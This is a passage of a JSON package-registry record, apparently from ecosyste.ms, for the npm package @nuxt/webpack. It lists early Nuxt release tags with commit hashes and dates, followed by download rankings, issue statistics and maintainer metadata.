tHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2024-10-29T22:52:08.540Z","dependent_packages_count":16,"downloads":855224,"downloads_period":"last-month","dependent_repos_count":56775,"rankings":{"downloads":0.24623291095701444,"dependent_repos_count":0.1262675420992175,"dependent_packages_count":1.4128083941841065,"stargazers_count":0.15447521562107158,"forks_count":0.5200789827399681,"docker_downloads_count":0.43739883261343837,"average":0.48287697970246946},"purl":"pkg:npm/%40nuxt/webpack","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/webpack","docker_dependents_count":252,"docker_downloads_count":1373618,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/webpack/dependencies","status":null,"funding_links":["https://github.com/sponsors/nuxt","https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2024-10-29T15:44:34.308Z","issues_count":5866,"pull_requests_count":3404,"avg_time_to_close_issue":9336455.487222355,"avg_time_to_close_pull_request":862062.3253012048,"issues_closed_count":4166,"pull_requests_closed_count":3069,"pull_request_authors_count":452,"issue_authors_count":2655,"avg_comments_per_issue":5.084896010910331,"avg_comments_per_pull_request":2.099882491186839,"merged_pull_requests_count":2749,"bot_issues_count":1,"bot_pull_requests_count":1257,"past_year_issues_count":2725,"past_year_pull_requests_count":2325,"past_year_avg_time_to_close_issue":1465899.066102591,"past_year_avg_time_to_close_pull_request":278153.12717852095,"past_year_issues_closed_count":1881,"past_year_pull_requests_closed_count":2121,"past_year_pull_request_authors_count":310,"past_year_issue_authors_count":1437,"past_year_avg_comments_per_issue":3.424954128440367,"past_year_avg_comments_per_pull_request":2.0623655913978496,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":949,"past_year_merged_pull_requests_count":1933,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":819,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":227,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"pi0","count":127,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"manniL","count":93,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":77,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"antfu","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"Atinux","count":40,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"Hebilicious","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"BobbieGoede","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"dargmuesli","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"warflash","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"ineshbose","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"farnabaz","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"madebyfabian","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"lihbr","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"arashsheyda","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"}],"active_maintainers":[{"login":"danielroe","count":497,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":153,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"manniL","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"userquin","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"BobbieGoede","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"pi0","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Atinux","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"madebyfabian","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"warflash","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"Hebilicious","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"lihbr","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"arashsheyda","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fwebpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fwebpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fwebpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fwebpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fwebpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fwebpack/codemeta","maintainers":[{"uuid":"pi0","login":"pi0","name":null,"email":"pyapar@gmail.com","url":null,"packages_count":689,"html_url":"https://www.npmjs.com/~pi0","role":null,"created_at":"2022-11-20T01:59:31.629Z","updated_at":"2022-11-20T01:59:31.629Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/pi0/packages"},{"uuid":"antfu","login":"antfu","name":null,"email":"anthonyfu117@hotmail.com","url":null,"packages_count":733,"html_url":"https://www.npmjs.com/~antfu","role":null,"created_at":"2022-11-20T01:59:31.613Z","updated_at":"2022-11-20T01:59:31.613Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/antfu/packages"},{"uuid":"atinux","login":"atinux","name":null,"email":"atinux@gmail.com","url":null,"packages_count":378,"html_url":"https://www.npmjs.com/~atinux","role":null,"created_at":"2022-11-20T01:59:31.619Z","updated_at":"2022-11-20T01:59:31.619Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/atinux/packages"},{"uuid":"danielroe","login":"danielroe","name":null,"email":"daniel@roe.dev","url":null,"packages_count":434,"html_url":"https://www.npmjs.com/~danielroe","role":null,"c